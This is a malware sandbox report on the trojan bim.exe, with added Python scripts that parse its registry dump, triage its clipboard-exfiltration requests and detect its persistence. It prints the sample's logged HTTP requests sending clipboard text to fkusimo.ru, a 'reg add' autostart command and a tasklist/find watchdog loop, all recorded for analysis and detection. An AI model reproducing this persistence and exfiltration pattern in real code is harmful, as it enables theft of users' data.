Trojan.Agent
Risk Level 1
 
File Size : 1300776 KB
File Type : Portable Executable file Win32 EXE
File Name : bim.exe
MD5 : 4397902b8215f9380ab2d1cfb7d289a1
SHA1 : 508f6d494a73cfd7db557450a492aa5c90613e0e
SHA256 : 05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95e (truncated in the listing; the full 64-character digest is visible in the clipboard data the sample sends to fkusimo.ru in the network section)

General information:

* File name: C:\Users\Cognus\Desktop\bim.exe

Changes to registry:

The Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows is a legacy (win.ini-style) autostart location: whatever it names is launched at the user's next logon, so this write is the sample's persistence for system.exe. The MuiCache entries are a side effect of each executable being run and record the FileDescription from its version resource; bim.exe presents itself as "Video Editor" and the dropped ap.exe as "Something". The SandboxieRpcSs.exe entry and the C:\Sandbox\... paths come from the Sandboxie analysis environment, not from the sample. Each "binary data" line is the new value as UTF-16LE hex.

* Modifies value "Load=C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows NT\CurrentVersion\Windows
binary data=43003A005C00550073006500720073005C0043006F0067006E00750073005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C0046006F006C006400650072004E005C00730079007300740065006D002E006500780065000000
old value "Load=0000"
* Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
* Creates value "SandboxieRpcSs.exe=Sandboxie COM Services (RPC)" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Program Files\Sandboxie
binary data=530061006E00640062006F00780069006500200043004F004D002000530065007200760069006300650073002000280052005000430029000000
* Creates value "cmd.exe=Windows Command Processor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=570069006E0064006F0077007300200043006F006D006D0061006E0064002000500072006F0063006500730073006F0072000000
* Creates value "timeout.exe=timeout - pauses command processing" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=740069006D0065006F007500740020002D002000700061007500730065007300200063006F006D006D0061006E0064002000700072006F00630065007300730069006E0067000000
* Creates value "tasklist.exe=Lists the current running tasks" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=4C00690073007400730020007400680065002000630075007200720065006E0074002000720075006E006E0069006E00670020007400610073006B0073000000
* Creates value "find.exe=Find String (grep) Utility" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
binary data=460069006E006400200053007400720069006E006700200028006700720065007000290020005500740069006C006900740079000000
* Creates value "ap.exe=Something" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\Cognus\DefaultBox\user\current\AppData\Local\Temp
binary data=53006F006D0065007400680069006E0067000000
* Creates value "bim.exe=Video Editor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Users\Cognus\Desktop
binary data=56006900640065006F00200045006400690074006F0072000000
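The registry entries above carry each value twice, as a printed string and as a UTF-16LE hex dump. The following added example (not part of the report or of any Sniper Antivirus tooling) parses a few of these lines, decodes the hex to confirm it matches the printed value, flags the Load value as an autostart location, and recovers the executable path and FileDescription from each MuiCache entry. The input lines are copied from the report; the autostart key list is an assumed, short subset of what a real persistence check would cover.

```python
import re

# Constructed input: three "Changes to registry" lines copied from the report.
REPORT_LINES = r"""
* Modifies value "Load=C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows NT\CurrentVersion\Windows
binary data=43003A005C00550073006500720073005C0043006F0067006E00750073005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C0046006F006C006400650072004E005C00730079007300740065006D002E006500780065000000
* Creates value "bim.exe=Video Editor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Users\Cognus\Desktop
binary data=56006900640065006F00200045006400690074006F0072000000
* Creates value "ap.exe=Something" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Sandbox\Cognus\DefaultBox\user\current\AppData\Local\Temp
binary data=53006F006D0065007400680069006E0067000000
""".strip("\n")

VALUE_LINE = re.compile(
    r'^\* (?P<op>Creates|Modifies) value "(?P<name>[^=]+)=(?P<data>.*?)" in key (?P<key>.+)$')

# Assumed subset of user-hive autostart locations: (key suffix, value names or None for any).
AUTOSTART_KEYS = (
    (r"\microsoft\windows nt\currentversion\windows", {"load", "run"}),
    (r"\microsoft\windows\currentversion\run", None),
    (r"\microsoft\windows\currentversion\runonce", None),
)
MUICACHE_MARKER = "\\shell\\muicache\\"


def decode_reg_binary(hex_dump: str) -> str:
    """The report dumps REG_SZ data as UTF-16LE hex including the NUL terminator."""
    return bytes.fromhex(hex_dump).decode("utf-16-le").rstrip("\x00")


def parse_registry_changes(text: str) -> list:
    """Pair each value line with the 'binary data=' line that follows it."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries.append({**m.groupdict(), "decoded": None})
        elif line.startswith("binary data=") and entries:
            entries[-1]["decoded"] = decode_reg_binary(line[len("binary data="):])
    return entries


def classify(entry: dict) -> str:
    key = entry["key"].lower()
    for suffix, names in AUTOSTART_KEYS:
        if key.endswith(suffix) and (names is None or entry["name"].lower() in names):
            return "autostart"
    if MUICACHE_MARKER in key:
        return "muicache"
    return "other"


def muicache_origin(entry: dict):
    """MuiCache key ends with the directory; the value name is the file, the data its FileDescription."""
    idx = entry["key"].lower().index(MUICACHE_MARKER) + len(MUICACHE_MARKER)
    return entry["key"][idx:] + "\\" + entry["name"], entry["data"]


def summarize(text: str) -> list:
    out = []
    for e in parse_registry_changes(text):
        if e["decoded"] is not None and e["decoded"] != e["data"]:
            out.append(("mismatch", e["name"], e["decoded"]))  # hex disagrees with printed value
        kind = classify(e)
        if kind == "autostart":
            out.append(("autostart", e["key"] + "\\" + e["name"], e["data"]))
        elif kind == "muicache":
            out.append(("executed",) + muicache_origin(e))
    return out


if __name__ == "__main__":
    for item in summarize(REPORT_LINES):
        print(*item, sep="  ")
```

The decode step is worth keeping in any report parser: if the printed string and the hex disagree, the printed one has been truncated or re-encoded, and the hex is the authoritative copy of what was written.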

Changes to filesystem:

The payload is staged in a hidden folder under Roaming as system.exe with a companion system.exe.bat, alongside svhost.exe, a name one letter away from the legitimate svchost.exe. Browsers.txt and Mails.txt are output files whose names suggest harvested browser and mail data; Mails.txt was empty in this run.

* Creates file C:\ProgramData\Browsers.txt
* Creates file (empty) C:\ProgramData\Mails.txt
* Creates file C:\Users\Cognus\AppData\Local\Temp\ap.exe
* Creates hidden folder C:\Users\Cognus\AppData\Roaming\FolderN
* Creates file C:\Users\Cognus\AppData\Roaming\FolderN\system.exe
* Creates file C:\Users\Cognus\AppData\Roaming\FolderN\system.exe.bat
* Creates file C:\Users\Cognus\AppData\Roaming\svhost.exe

Network services:

Only the fkusimo.ru traffic at the end of this list is attributed to bim.exe by the report; the many other DNS queries (Google, Facebook, mysmartprice, paytm, qheal.ctmail.com and the like) are not attributed to any process and look like browsing and background traffic on the analysis host rather than sample behaviour.

* Queries DNS "www.google.co.in".
* Queries DNS "ssl.gstatic.com".
* Queries DNS "apis.google.com".
* Queries DNS "www.gstatic.com".
* Queries DNS "id.google.co.in".
* Queries DNS "www.mysmartprice.com".
* Queries DNS "fonts.gstatic.com".
* Queries DNS "doypaxk1e2349.cloudfront.net".
* Queries DNS "034c7bb373c838e9e044-52af629139a1301948d7f711695e0783.r79.cf1.rackcdn.com".
* Queries DNS "c288724.r24.cf1.rackcdn.com".
* Queries DNS "c28655.r55.cf1.rackcdn.com".
* Queries DNS "a672c82f2734421c7062-2a7b68bd1399ab982df715c9d055b004.r0.cf1.rackcdn.com".
* Queries DNS "msp-ui-cdn.s3.amazonaws.com".
* Queries DNS "www.googletagmanager.com".
* Queries DNS "devvisualwebsiteoptimizer.com".
* Queries DNS "www.googletagservices.com".
* Queries DNS "4befd2b75084217bdb89-0db8ef8f76dda1bacd72a54e7571190e.r6.cf1.rackcdn.com".
* Queries DNS "coupons.mysmartprice.com".
* Queries DNS "c0028545.cdn1.cloudfiles.rackspacecloud.com".
* Queries DNS "www.google-analytics.com".
* Queries DNS "d1nfvnlhmjw5uh.cloudfront.net".
* Queries DNS "connect.facebook.net".
* Queries DNS "d2n45drhpt1edz.cloudfront.net".
* Queries DNS "ajax.googleapis.com".
* Queries DNS "www.facebook.com".
* Queries DNS "www.google.com".
* Queries DNS "cdn.livechatinc.com".
* Queries DNS "bs.serving-sys.com".
* Queries DNS "athena.mysmartprice.info".
* Queries DNS "b12984e4d8c82ca48867-a8f8a87b64e178f478099f5d1e26a20d.r85.cf1.rackcdn.com".
* Queries DNS "secure.livechatinc.com".
* Queries DNS "fkusimo.ru".
* Queries DNS "js-agent.newrelic.com".
* Queries DNS "bam.nr-data.net".
* Queries DNS "www.livechatinc.com".
* Queries DNS "fonts.googleapis.com".
* Queries DNS "d1gpfrwu766nab.cloudfront.net".
* Queries DNS "pagead2.googlesyndication.com".
* Queries DNS "fd379b09dfe5fd258cee-4c7efcc0fa50ed2f0ba8ecc23dd2f42d.ssl.cf1.rackcdn.com".
* Queries DNS "115b6fee8e6af24e5803-82cf6157a8169c9e50dc1c35c1fca86b.ssl.cf1.rackcdn.com".
* Queries DNS "cm.g.doubleclick.net".
* Queries DNS "googleads.g.doubleclick.net".
* Queries DNS "tpc.googlesyndication.com".
* Queries DNS "partner.googleadservices.com".
* Queries DNS "webres5.qheal.ctmail.com".
* Queries DNS "teredo.ipv6.microsoft.com".
* Queries DNS "ipaddress.com".
* Queries DNS "webres3.qheal.ctmail.com".
* Queries DNS "resolver1.qheal.ctmail.com".
* Queries DNS "resolver2.qheal.ctmail.com".
* Queries DNS "eca7be04b147deacfa4c-82cf6157a8169c9e50dc1c35c1fca86b.r11.cf1.rackcdn.com".
* Queries DNS "www.googleadservices.com".
* Queries DNS "graph.facebook.com".
* Queries DNS "0a139eea44aaa5b71501-dd7be9abd488a04eaa465c4563316f16.r46.cf1.rackcdn.com".
* Queries DNS "c223968.r68.cf1.rackcdn.com".
* Queries DNS "platform.twitter.com".
* Queries DNS "fbstatic-a.akamaihd.net".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-if-v6exp3-v4.metric.gstatic.com".
* Queries DNS "mspdeals.disqus.com".
* Queries DNS "sb.scorecardresearch.com".
* Queries DNS "staticxx.facebook.com".
* Queries DNS "webres2.qheal.ctmail.com".
* Queries DNS "webres4.qheal.ctmail.com".
* Queries DNS "disqus.com".
* Queries DNS "a.disquscdn.com".
* Queries DNS "www.snipercorporation.com".
* Queries DNS "syndication.twitter.com".
* Queries DNS "twitter.com".
* Queries DNS "glitter.services.disqus.com".
* Queries DNS "realtime.services.disqus.com".
* Queries DNS "clients1.google.com".
* Queries DNS "referrer.disqus.com".
* Queries DNS "ssl.google-analytics.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-i2-v6exp3-v4.metric.gstatic.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-i1-v6exp3-ds.metric.gstatic.com".
* Queries DNS "www.msftncsi.com".
* Queries DNS "p4-hswhghgiyhpou-2urhd6jt274t2223-193130-s1-v6exp3-v4.metric.gstatic.com".
* Queries DNS "a.rfihub.com".
* Queries DNS "pnc-147.pnc-rtb1.rfihub.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-if-v6exp3-v4.metric.gstatic.com".
* Queries DNS "secure-ds.serving-sys.com".
* Queries DNS "c1.rfihub.net".
* Queries DNS "p.rfihub.com".
* Queries DNS "paytm.com".
* Queries DNS "cdnjs.cloudflare.com".
* Queries DNS "maps.googleapis.com".
* Queries DNS "shop.paytm.com".
* Queries DNS "csi.gstatic.com".
* Queries DNS "datahub.serving-sys.com".
* Queries DNS "ad.doubleclick.net".
* Queries DNS "gateway.answerscloud.com".
* Queries DNS "u.heatmap.it".
* Queries DNS "in-tags.vizury.com".
* Queries DNS "catalog.paytm.com".
* Queries DNS "themes.googleusercontent.com".
* Queries DNS "sp.analytics.yahoo.com".
* Queries DNS "stats.g.doubleclick.net".
* Queries DNS "4516565.fls.doubleclick.net".
* Queries DNS "cart.paytm.com".
* Queries DNS "assetscdn.paytm.com".
* Queries DNS "sg-pl.vizury.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-872661-i1-v6exp3-v4.metric.gstatic.com".
* Queries DNS "p4-g6osfa34cyanu-rgdnazlrshfp4hg4-872661-i2-v6exp3-ds.metric.gstatic.com".
* Queries DNS "eu2.heatmap.it".
* Queries DNS "scontent.webcollage.net".
* Queries DNS "d22vyp49cxb9py.cloudfront.net".
* Queries DNS "www.dsply.com".
* Queries DNS "20000.betaout.in".
* Queries DNS "cdn8.vizury.com".
* Queries DNS "s3.amazonaws.com".
* Queries DNS "resolver3.qheal.ctmail.com".
* Queries DNS "resolver5.qheal.ctmail.com".
* Queries DNS "webres1.qheal.ctmail.com".
* Queries DNS "crl.microsoft.com".
* C:\Users\Cognus\Desktop\bim.exe connects to "83.217.27.119" on port 80 (TCP - HTTP).
* HTTP request to "fkusimo.ru/web/image/upload.php".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=%09bim.exe&machinetime=11:52%20AM".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:52%20AM".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:53%20AM".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:54%20AM".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:55%20AM".
* HTTP request to "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:56%20AM".
* Uses POST methods in HTTP.

The post.php requests are clipboard exfiltration, not downloads: the query string carries the computer name (WIN-RPCI1RTAJ57), the active window title (empty here), the current clipboard contents and the local time, and is re-sent about once a minute. The first clipboard value is a tab (%09) followed by "bim.exe"; the later ones are a 64-character hex string whose prefix matches the sample's own SHA256 listed at the top of the page.
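The request lines above are easy to misread as downloads. The following added example (not part of the report or of any Sniper Antivirus tooling) parses them the way a proxy-log triage script would: it splits host, path and query, recognises the post.php clipboard-beacon shape, collapses the once-a-minute repeats into one record per distinct clipboard value, and marks values that look like a hash digest. The input lines are copied from the report; the SHA256 prefix is the one listed at the top of the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed input: request lines copied from the report's network section.
REQUEST_LINES = [
    "fkusimo.ru /web/image/upload.php",
    "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=%09bim.exe&machinetime=11:52%20AM",
    "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:52%20AM",
    "fkusimo.ru/web/post.php?type=clipboard&machinename=WIN-RPCI1RTAJ57&windowtitle=&clipboardtext=05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95ea9e0555bb8c150&machinetime=11:53%20AM",
]

SAMPLE_SHA256_PREFIX = "05d5c8688fdab8cd0ccd82469987b65210fbb13d2d5c98d95e"  # as listed on the page
HEX_DIGEST = re.compile(r"^[0-9a-f]{32}$|^[0-9a-f]{40}$|^[0-9a-f]{64}$", re.I)  # MD5/SHA1/SHA256 shapes


def parse_request(line: str) -> dict:
    """Split a 'host/path?query' line (the report omits the scheme) into its parts."""
    line = line.replace(" /", "/", 1).strip()
    parts = urlsplit("http://" + line)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"host": parts.hostname, "path": parts.path, "params": params}


def is_clipboard_post(req: dict) -> bool:
    """C2 shape seen in the report: post.php with type=clipboard and a machine name."""
    p = req["params"]
    return req["path"].endswith("/post.php") and p.get("type") == "clipboard" and "machinename" in p


def exfil_events(lines) -> list:
    """One record per distinct clipboard value sent; repeats are counted as beacons."""
    events, last = [], None
    for line in lines:
        req = parse_request(line)
        if not is_clipboard_post(req):
            continue
        p = req["params"]
        text = p.get("clipboardtext", "")
        if text == last:
            events[-1]["beacons"] += 1
            continue
        last = text
        events.append({
            "host": req["host"],
            "machine": p.get("machinename"),
            "clipboard": text,                 # percent-decoded, so %09 becomes a tab
            "time": p.get("machinetime"),
            "looks_like_digest": bool(HEX_DIGEST.match(text)),
            "beacons": 1,
        })
    return events


if __name__ == "__main__":
    for ev in exfil_events(REQUEST_LINES):
        print(ev)
```

Because the stolen data travels in the query string, a plain web-proxy log already contains everything needed to reconstruct what was exfiltrated; the `looks_like_digest` flag is there so the triage script can separate an analyst's copied hash from a victim's pasted credential or wallet address.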

Process/window/string information:

The CorDBIPCSetupSyncEvent_<pid> events and the "Global\.net clr networking" mutex are created by the .NET runtime, so the sample and its dropped ap.exe are managed (.NET) executables. The keystroke hook is keylogging; opening VaultSvc (Credential Manager) alongside the Browsers.txt and Mails.txt outputs fits credential harvesting; marking a process system-critical means that terminating it crashes Windows, which hampers manual removal. The cmd.exe child commands are the persistence write (reg add ... /v Load) followed by a short delay and a check whether svhost.exe is running (tasklist /fi "imagename eq svhost.exe" piped through find /i "svhost.exe"), the usual batch-file watchdog pattern.

* Escalates a process to system critical status.
* Gets user name information.
* Gets computer name.
* Checks for debuggers.
* Installs a hook procedure that monitors keystroke messages.
* Removes Zone.Identifier information.
* Uses a pipe for inter-process communication.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1064".
* Enables privilege SeDebugPrivilege.
* Creates process "null, "cmd.exe", C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\cmd.exe".
* Creates process "C:\Windows\system32\reg.exe, reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" /f, C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\reg.exe".
* Creates process "null, C:\Users\Cognus\AppData\Roaming\FolderN\system.exe.bat, null".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2932".
* Creates process "C:\Windows\system32\timeout.exe, timeout /t 4, C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\timeout.exe".
* Creates process "C:\Windows\system32\tasklist.exe, tasklist /nh /fi "imagename eq svhost.exe" , C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\tasklist.exe".
* Creates process "C:\Windows\system32\find.exe, find /i "svhost.exe" , C:\Users\Cognus\Desktop".
* Injects code into process "C:\Windows\System32\find.exe".
* Enumerates running processes.
* Creates process "C:\Users\Cognus\AppData\Local\Temp\ap.exe, "C:\Users\Cognus\AppData\Local\Temp\ap.exe" , null".
* Injects code into process "C:\Sandbox\Cognus\DefaultBox\user\current\AppData\Local\Temp\ap.exe".
* Opens a service named "VaultSvc".
* Starts a service.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3752".
* Creates a mutex "Global\.net clr networking".
* Enables privilege SeAuditPrivilege.
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1384".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3924".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4024".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2252".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2496".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_612".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3088".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2912".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3680".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1644".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2408".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3700".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1708".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4048".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2284".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_1268".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3092".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2908".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_2896".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_3052".
* Creates an event named "Global\CorDBIPCSetupSyncEvent_4016".
* Enables process privileges.
* Contains the string "CurrentUser", which the analyzer flags as a Norman Sandbox detection routine (anti-analysis check).
* Sleeps 74347 seconds.
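The process list above shows three behaviours that are cheap to detect from process-creation telemetry alone: reg.exe writing the Load autostart value, cmd.exe running a batch file out of AppData, and the tasklist/find pair that checks whether a named process is alive. The following added example (not part of the report or of any Sniper Antivirus tooling) runs those three rules, plus a filename-masquerading check against the dropped files, over constructed events modelled on the report's "Creates process" lines. The parent attribution, the cmd.exe /c wrapper for the .bat file, the lookalike name list and the benign control event at the end are all assumptions; the report does not state them.

```python
import re

# Constructed process-creation events (parent image, image, command line) modelled on
# the report's "Creates process" lines. The last event is a benign control that must not fire.
EVENTS = [
    (r"C:\Users\Cognus\Desktop\bim.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
     r'reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\Users\Cognus\AppData\Roaming\FolderN\system.exe" /f'),
    (r"C:\Users\Cognus\Desktop\bim.exe", r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c "C:\Users\Cognus\AppData\Roaming\FolderN\system.exe.bat"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\timeout.exe", "timeout /t 4"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\tasklist.exe", 'tasklist /nh /fi "imagename eq svhost.exe"'),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\find.exe", 'find /i "svhost.exe"'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\tasklist.exe", "tasklist /svc"),
]

# Paths copied from the report's "Changes to filesystem" section.
CREATED_FILES = [
    r"C:\Users\Cognus\AppData\Local\Temp\ap.exe",
    r"C:\Users\Cognus\AppData\Roaming\FolderN\system.exe",
    r"C:\Users\Cognus\AppData\Roaming\svhost.exe",
]

LOAD_AUTOSTART = re.compile(r"windows nt\\currentversion\\windows\b.*\s/v\s+(load|run)\b", re.I)
SCRIPT_FROM_APPDATA = re.compile(r"\\appdata\\.*\.(bat|cmd)\b", re.I)
TASKLIST_FILTER = re.compile(r'imagename\s+eq\s+([^\s"]+)', re.I)
FIND_NEEDLE = re.compile(r'find(?:str)?\s+/i\s+"([^"]+)"', re.I)
# Assumed lookalike list: names that belong under System32 but show up elsewhere.
SYSTEM_NAMES = {"svchost.exe", "svhost.exe", "system.exe", "csrss.exe", "lsass.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(events) -> list:
    """Return (rule, detail) hits; the watchdog rule correlates tasklist and find under one parent."""
    hits, watched = [], {}
    for parent, image, cmd in events:
        name = basename(image)
        if name == "reg.exe" and LOAD_AUTOSTART.search(cmd):
            hits.append(("registry_load_autostart", cmd))
        elif name == "cmd.exe" and SCRIPT_FROM_APPDATA.search(cmd):
            hits.append(("script_from_appdata", cmd))
        elif name == "tasklist.exe":
            m = TASKLIST_FILTER.search(cmd)
            if m:
                watched.setdefault(parent.lower(), set()).add(m.group(1).lower())
        elif name in ("find.exe", "findstr.exe"):
            m = FIND_NEEDLE.search(cmd)
            if m and m.group(1).lower() in watched.get(parent.lower(), ()):
                hits.append(("process_watchdog_loop", m.group(1).lower()))
    return hits


def masquerading_paths(paths) -> list:
    """System-looking binary names created outside the Windows system directories."""
    return [p for p in paths
            if basename(p) in SYSTEM_NAMES and not p.lower().startswith(SYSTEM_DIRS)]


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(rule, detail, sep=": ")
    for p in masquerading_paths(CREATED_FILES):
        print("masquerading_path:", p)
```

The watchdog rule keys on the parent rather than on a single command line because neither `tasklist /fi` nor `find /i` is suspicious on its own; it is the pair, filtering and searching for the same image name from the same interpreter, that reproduces the "restart my payload if it died" idiom.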

Additional Information:

How To Remove bim.exe

1. Download Sniper Antivirus.
2. Install the exe file on your system.
3. Run a full scan of your computer, or scan the folder where bim.exe is located.
4. Once the scan is finished, you'll get the message "scan is complete". Click the OK button to see the results.
5. Delete the threat from the table.
